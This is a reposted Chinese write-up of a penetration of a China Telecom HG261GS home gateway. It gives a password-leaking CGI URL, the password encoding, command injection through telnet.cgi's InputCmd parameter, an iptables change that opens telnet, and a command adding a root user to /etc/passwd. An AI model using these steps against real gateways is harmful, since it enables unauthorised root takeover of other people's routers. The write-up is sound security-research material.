|
|
现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
0x00 起因
0x01 信息泄露
我家这个网关型号是 HG261GS,经过一番搜索,发现访问 http://192.168.1.1/cgi-bin/baseinfoSet.cgi可以拿到密码
然后搜索密码的加密方式,得到工程账号的密码,加密算法为加密算法:字母转换为其ASCII码+4,数字直接就是ASCII码
之后登录
0x02 命令执行
http://192.168.1.1/cgi-bin/telnet.cgi通过InputCmd参数可以直接执行系统命令,然后访问http://192.168.1.1/cgi-bin/telnet_output.log可以看到执行结果,通过js下的telnet.js也可以访问http://192.168.1.1/cgi-bin/submit.cgi得到执行结果
硬件牛盖子一拆就能长驱直入了,我也想,但是实力不允许首先先导出原配置文件,在管理-设备管理,插个U盘,备份配置即可
这里导出配置感觉不太合适,万一弄坏了其他人都上不了网了,拆盖子又不会,那么只能继续摸索,转换下思路,既然有配置文件,那么肯定有读取配置文件去开启的功能,直接find搜索所有cgi文件InputCmd=find%20/%20-name%20"*cgi*",找到一个名叫telnetenable.cgi的文件,这不就是开启telnet的东西嘛
iptables -D INPUT 3,然后添加23端口允许通过,效果如下
0x03 添加用户
echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" /etc/passwd登录成功~
最后记得关掉telnet,光猫作为出口,会有个公网地址,开启后公网也可以远程登录进来关闭命令killall telnetd >/dev/null 2>&1
文章来源:先知社区(7tem7)原文地址:https://xz.aliyun.com/t/9046
关注我们
还在等什么?赶紧点击下方名片开始学习吧!
知 识 星 球
推 荐 阅 读
原文始发于微信公众号(潇湘信安):记一次对天翼安全网关的渗透
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论